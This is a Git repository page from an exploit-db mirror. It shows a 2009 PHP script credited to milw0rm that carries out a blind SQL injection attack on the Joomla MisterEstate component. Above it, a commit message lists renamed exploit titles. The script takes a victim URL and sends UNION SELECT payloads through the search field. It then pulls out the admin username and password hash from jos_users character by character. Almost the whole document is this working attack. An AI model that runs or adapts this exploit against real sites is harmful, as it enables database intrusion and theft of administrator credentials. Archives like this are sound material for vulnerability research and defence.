bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/platforms/php/webapps/9463.php
Offensive Security 477bcbdcc0 DB: 2016-03-17 
5 new exploits

phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit
phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities

My Book World Edition NAS Multiple Vulnerability
My Book World Edition NAS - Multiple Vulnerabilities

Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL
Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities

cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability
cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities

DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php)
DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities

Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability
Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities

N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability
N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities

New-CMS - Multiple Vulnerability
New-CMS - Multiple Vulnerabilities

Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability
Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities

JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability
JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities

i-Gallery - Multiple Vulnerability
i-Gallery - Multiple Vulnerabilities

My Kazaam Notes Management System Multiple Vulnerability
My Kazaam Notes Management System - Multiple Vulnerabilities

Omnidocs - Multiple Vulnerability
Omnidocs - Multiple Vulnerabilities

Web Cookbook Multiple Vulnerability
Web Cookbook - Multiple Vulnerabilities

KikChat - (LFI/RCE) Multiple Vulnerability
KikChat - (LFI/RCE) Multiple Vulnerabilities

Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability
Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability

xEpan 1.0.4 - Multiple Vulnerability
xEpan 1.0.4 - Multiple Vulnerabilities
AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection
Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow
Cisco UCS Manager 2.1(1b) - Shellshock Exploit
OpenSSH <= 7.2p1 - xauth Injection
FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
2016-03-17 07:07:56 +00:00

135 lines
2.6 KiB
PHP
Executable file
Raw Blame History

<?php
echo '<h2>Joomla Component MisterEstate Blind SQL Injection Exploit</h2>';
// http://www.misterestate.com/
ini_set( "memory_limit", "512M" );
ini_set( "max_execution_time", 0 );
set_time_limit( 0 );
if( !isset( $_GET['url'] ) ) die( 'Usage: '.$_SERVER['SCRIPT_NAME'].'?url=www.victim.com' );
$url = "http://".$_GET['url']."/index.php?option=com_misterestate&act=mesearch&task=showMESR&tmpl=component";
$data = array();
$data['src_cat'] = 0;
$data['country'] = 'no';
$data['state'] = 'no';
$data['town'] = 'no';
$data['district'] = 'no';
$data['mesearch'] = 'Start Search';
$admin = '';
$output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 ORDER BY id ASC LIMIT 1 -- '" );
if( !testData( $output ) ) die('failed');
echo '<br />Check passed... trying exploit...<br /><br />';
for( $i=0;$i<250;$i++ )
{
for( $j=48; $j<126; $j++ )
{
$output = getData( "1%') AND 1=2 UNION SELECT id FROM jos_users WHERE gid=25 AND ASCII(SUBSTRING(CONCAT(username,0x3a,password),$i,1)) = $j ORDER BY id ASC LIMIT 1 -- '" );
if( testData( $output ) )
{
ob_end_clean();
$admin .= chr( $j );
echo "Found character $i : buffer is now $admin<br />";
}
ob_end_clean();
}
}
echo "<h3>All done!</h3>";
echo "<h4>$admin</h4>";
function shutUp( $buffer ) { return false; }
function testData( $output )
{
/* feel free to add other translations as needed */
$reg = array( '/Your\ search\ produced\ 1\ hits/', '/Su\ busqueda\ ha\ encontrado\ 1\ aciertos/' );
foreach( $reg as $r )
if( preg_match( $r, $output ) )
return TRUE;
return FALSE;
}
function getData( $string )
{
global $data, $url;
$data['searchstring'] = $string;
ob_start( "shutUp" );
$ch = curl_init();
curl_setopt( $ch, CURL_TIMEOUT, 120 );
curl_setopt( $ch, CURL_RETURNTRANSFER, 0 );
curl_setopt( $ch, CURLOPT_URL, $url );
if( count( $data ) > 0 )
{
curl_setopt( $ch, CURLOPT_POST, count( $data ) );
curl_setopt( $ch, CURLOPT_POSTFIELDS, http_build_query( $data ) );
}
curl_setopt( $ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)" );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 );
$result = curl_exec( $ch );
curl_close( $ch );
return ob_get_contents();
}
/* jdc 2009 */
# milw0rm.com [2009-08-18]
Reference in a new issue View git blame Copy permalink